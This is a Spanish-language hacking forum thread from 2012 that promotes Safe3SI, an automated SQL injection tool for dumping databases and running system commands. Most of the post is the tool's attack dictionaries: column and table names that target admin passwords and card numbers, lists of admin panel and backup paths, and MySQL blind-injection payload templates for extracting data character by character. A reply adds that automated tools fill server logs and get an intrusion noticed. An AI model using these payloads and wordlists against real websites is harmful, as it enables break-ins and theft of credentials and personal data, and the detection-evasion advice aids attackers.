3. Safe3SI
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

Safe3SI

  • 1 Respuestas
  • 1884 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet

Safe3SI

« en: Noviembre 16, 2012, 12:55:33 pm »



Safe3SI es un herramienta que automatiza el proceso de detección y aprovechamiento de defectos de inyección sql y de servidores de base de datos. Viene con un motor de detección de kick-ass, muchas características para el probador de penetración máxima y una amplia gama de interruptores de base de datos de rastro digital, sobre la obtención de datos de la base de datos, para acceder el sistema de archivos subyacente y ejecutar comandos en el sistema operativo a través de conexiones fuera de banda.

Columns:

Código: [Seleccionar]
about
access
account
accounts
admin
admin_id
admin_name
admin_pass
admin_passwd
admin_password
admin_psw
admin_pwd
admin_user
admin_userid
admin_username
adminemail
adminid
Administrateur
Administrator
administrator_name
administrators
adminlogin
adminmail
adminname
adminpass
adminpassword
adminpaw
adminpsw
adminpwd
admins
AdminUID
adminupass
adminuser
adminuserid
adminusername
adress
aid
Aide
aim
apwd
ArticleID
auid
blog
cc_number
cc_owner
cfg
cid
city
client
clientname
clientpassword
clients
clientusername
conf
config
content
converge_pass_hash
converge_pass_salt
crack
customer
customers
customers_password
data
db_hostname
db_password
db_username
dw
E-mail
e_mail
email
emailaddress
feed
feedback
gid
glmm
group
hash
id
id_member
images
index
isadmin
key
keywords
last_login
lastname
log
login
login_admin
login_name
login_pass
login_passwd
login_password
login_pw
login_pwd
login_user
login_username
logini
loginkey
logins
logo
mail
md5hash
mem_login
mem_pass
mem_passwd
mem_password
mem_pwd
member
member_id
member_login_key
member_name
memberid
membername
members
memlogin
mempassword
mima
mm
mpassword
msn
musername
my_email
my_name
my_password
my_username
myname
mypassword
myusername
name
nc
new
news
newsid
note
number
Numer
nummer
p
p_assword
p_word
pass
pass1word
pass_hash
pass_w
pass_word
passer
Passw
passwd
password
Passwort
passwrd
pe_aduser
pe_user
phone
POWER
psw
pswd
pw
pwd
pwd1
pword
pwrd
qq
sb_admin_name
sb_pwd
search
sesskey
setting
sid
spacer
status
Stocker
store
sysuser
telephone
temp_pass
temp_password
temppass
temppasword
text
texte
title
u
u_name
uid
un
uname
url
user
user1
user_admin
user_email
user_id
user_ip
user_level
user_login
user_n
user_name
user_pass
user_passw
user_passwd
user_password
user_pw
user_pwd
user_pword
user_pwrd
user_uname
user_username
user_usernm
user_usernun
user_usrnm
useradmin
userid
userip
Userlogin
usern
username
user_name
usernm
userpass
userpasswd
userPassword
userpw
userpwd
users
usr
usr2
usr_n
usr_name
usr_nusr
usr_pass
usr_pw
usrn
usrnam
usrname
usrnm
usrpass
usrs
website
wind
wp_users
xar_name
xar_pass
yh
yhm
yhmm
yonghu
WebPath:

Código: [Seleccionar]
Stats/
ad/
ad_login/
ad_manage/
adm/
adm_login/
admin/
admin/default/
admin/index/
admin/login/
admin/manage/
admin1/
admin888/
admin_admin/
admin_login/
adminadmin/
administrator/
adminlogin/
amd/
article/admin/
backup/
chkadmin/
chklogin/
config/
database/
databases/
db/
dbase/
denglu/
eWebEditor/
editor/
files/
guanli/
houtai/
houtaiguanli/
htdocs/
htgl/
include/
includes/
incoming/
install/
login/
login1/
manage/
manager/
manager/login/
manual/
mrtg/
private/
public/
root/
secret/
secrets/
server-info/
server-status/
server_stats/
set/
setting/
setup/
snmp/
source/
sources/
sql/
statistics/
super/
superadmin/
sys_admin/
telephone/
temp/
temporary/
test/
tool/
tools/
up/
update/
upfile/
upload/
usage/
user/
users/
webadmin/
weblog/
weblogs/
webmaster/
webstats/
work/
wstats/
wwwlog/
wwwstats/
xtwh/
.htaccess
pma/
phpMyAdmin/
ad_login{ext}
ad_manage{ext}
addmember{ext}
adduser{ext}
add_user{ext}
add_file{ext}
add_pic{ext}
adm_login{ext}
admin123{ext}
admin1{ext}
admin888{ext}
admin_admin{ext}
admin_delete{ext}
admin_del{ext}
admin_edit{ext}
admin_index{ext}
admin_login{ext}
admin_main{ext}
admin_user{ext}
adminadduser{ext}
admindefault{ext}
admindelete{ext}
admindel{ext}
adminedit{ext}
adminindex{ext}
administrator{ext}
adminlogin{ext}
adminmanage{ext}
adminmember{ext}
admintab{ext}
adminuserlogin{ext}
adminuser{ext}
admin{ext}
ad{ext}
aspcheck{ext}
chkadmin{ext}
chklogin{ext}
config{ext}
conn{ext}
default{ext}
delete{ext}
denglu{ext}
editmember{ext}
edituser{ext}
editor{ext}
guanli{ext}
houtaiguanli{ext}
houtai{ext}
htgl{ext}
index_admin{ext}
index_manage{ext}
index{ext}
left{ext}
login_admin{ext}
login_out{ext}
login{ext}
logout{ext}
main{ext}
manage_index{ext}
manager{ext}
manage{ext}
members{ext}
member{ext}
menu{ext}
top{ext}
upfile{ext}
upload{ext}
up{ext}
users{ext}
user{ext}
MySql:

Código: [Seleccionar]
%20and%201=2%23
%20and%20(select%20char_length(<column>)%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23
%20and%20(select%20abs(ascii(substr(<column>,<index>,1)))%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23
Tables:

Código: [Seleccionar]
a_admin
account
accounts
ACT_INFO
ad
adm
admin
admin_login
admin_name
admin_pass
admin_password
admin_psw
admin_pwd
admin_user
admin_userinfo
admin_username
administrator
administrators
adminname
adminpass
adminpassword
adminpsw
admins
adminupass
adminuser
adminusername
Art
article
Autor
BBS
book
chat
Client
clients
clubconfig
cms_admin
cms_admins
cms_user
cms_users
company
config
Contact
content
contenu
control
controle
Country
customer
customers
dbadmins
download
dw
Event
gl
glmm
gly
group
guanli
guanliyuan
h_admin
images
Index
info
key
keywords
login
logon
logs
m_admin
main
manage
manager
mb_users
member
memberlist
members
mima
mm
movie
mpassword
musername
mybb_users
mysql
mysql.user
name
names
nc
new
news
order
pass
password
passwords
phpmyadmin.pma_table_info
pma_table_info
power
powers
psw
pswd
pw
pwd
pwd1
pwds
reg_user
reg_users
reguser
regusers
root
roots
session
setting
settings
site_login
site_logins
SITELOGIN
sitelogins
Subjects
Superuser
sys
sysadmin
sysadmins
sysconstraints
syssegments
System
systime
sysuser
sysusers
table
tables
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tbl
tbl_user
tbl_users
tbladmins
tblConfigs
tblUser
test
Titel
u
u_n
u_name
u_p
u_pass
uid
user
user_admin
user_info
user_list
user_login
user_name
user_pw
UserControl
userinfo
username
usernames
userpasswd
userpassword
userpwd
users
usr
usr_pw
usrs
vb_user
vip
WebAdmin
webadmins
Webmaster
webmasters
webuser
webusers
x_admin
yhm
yhmm

http://code.google.com/p/safe3si/
En línea

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
Re:Safe3SI
« Respuesta #1 en: Noviembre 16, 2012, 02:18:39 pm »
Buena tool, pero hago incapie en q todos deben aprender a realziar sqli y blind sqli a mano, ese es el verdadero reto y lo q lo hace interesante, porq encontrar el sqli es relativamente facil, y explotarla con una tool no es apropiado a no ser q  sea una DB muy amplia, ya q las tools llenan los logs, y salta el sqli apenas revisan los log. Buen Aporte!
En línea

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo
Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!